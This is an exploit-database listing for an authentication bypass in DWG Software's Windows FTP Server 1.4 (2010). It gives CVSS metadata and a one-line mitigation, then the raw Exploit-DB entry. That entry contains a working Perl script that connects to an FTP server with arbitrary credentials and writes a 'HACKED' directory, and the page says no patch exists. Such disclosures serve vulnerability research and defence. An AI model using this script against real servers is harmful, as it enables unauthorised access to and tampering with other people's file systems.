header-logo
Suggest Exploit
vendor:
Windows FTP Server
by:
chap0
7,5
CVSS
HIGH
Authentication Bypass
287
CWE
Product Name: Windows FTP Server
Affected Version From: 1.4
Affected Version To: 1.4
Patch Exists: NO
Related CWE: N/A
CPE: a:dwg_software:windows_ftp_server
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP SP3
2010

WINDOWS FTP SERVER by DWG (Auth Bypass)

Windows FTP Server by DWG Software is vulnerable to authentication-bypass that will allow attackers to connect with any username and password. This give attackers full access to the Top Level directory of the ftp server.

Mitigation:

Enforce strong authentication policies and use two-factor authentication.
Source

Exploit-DB raw data:

# Exploit Title: WINDOWS FTP SERVER by DWG (Auth Bypass) 
# Date: April 09, 2010
# Software Link: [http://www.windowsftpserver.com/free_download.html]
# Version: v 1.4
# Tested on: Windows XP SP3
# Author: chap0 
# Email: chap0x90[at]gmail[dot]com
# Site: [www.setfreesecurity.com]
# 
# Windows FTP Server by DWG Software is vulnerable to
# authentication-bypass that will allow attackers to 
# connect with any username and password.
# This give attackers full access to the Top Level 
# directory of the ftp server.
#
# Greetz and many thanks to all Exploit-DBers and GOD gets the Glory
# 
# 
#!/usr/bin/perl

use IO::Socket;

$luser = "evil";
$pass = "hacker";

$mysock = IO::Socket::INET->new(PeerAddr =>'192.168.2.6', PeerPort => '21', Proto => 'tcp');

print "Connecting with a bad credentials. . .\n";
sleep(1);

print $mysock "USER $luser\r\n";
print $mysock "PASS $pass\r\n";

print "Making HACKED folder . . .\n";
sleep(2);

print $mysock "MKD HACKED\r\n";

print "DONE . . .\n";
sleep(1);